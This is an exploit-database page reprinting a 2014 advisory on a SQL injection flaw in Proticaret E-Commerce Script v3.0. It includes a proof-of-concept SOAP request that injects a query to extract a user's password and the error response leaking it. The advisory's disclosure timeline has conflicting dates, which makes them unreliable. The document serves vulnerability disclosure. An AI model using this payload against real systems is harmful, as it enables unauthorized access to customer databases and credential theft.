0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Proticaret E-Commerce Script 3.0 - SQL Injection Vulnerability

Author

Onur Alanbel

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
 
Release Date:
===========
13 Nov 2014
 
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
 
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
 
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 :   Contact with Vendor
20 Nov 2014 :   Vendor Response
June 26, 2014   :   Patch Released
13 Nov 2014 :   Public Disclosure
 
Discovery Status:
=============
Published
 
Affected Product(s):
===============
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=
 
Exploitation Technique:
==================
Remote, Unauthenticated
 
 
Severity Level:
===========
Critical
 
Technical Details & Description:
========================
SQL Injection
 
Proof of Concept (PoC):
==================
Proof of Concept
 
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetProductCodes>
         <!--Optional:-->
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-  -</tem:Code>
         <!--Optional:-->
         <tem:StartWith>?</tem:StartWith>
      </tem:GetProductCodes>
   </soapenv:Body>
</soapenv:Envelope>
 
Response:
 
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <soap:Fault>
         <faultcode>soap:Server</faultcode>
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
         <detail/>
      </soap:Fault>
   </soap:Body>
</soap:Envelope>
 
 
Solution Fix & Patch:
================
Apply the patch for v3.0
 
Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.
 
Credits & Authors:
==============
Bilgi Güvenliği Akademisi
 
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

#  0day.today [2024-07-08]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Proticaret E-Commerce Script 3.0 - SQL Injection Vulnerability

Report Error

Report Error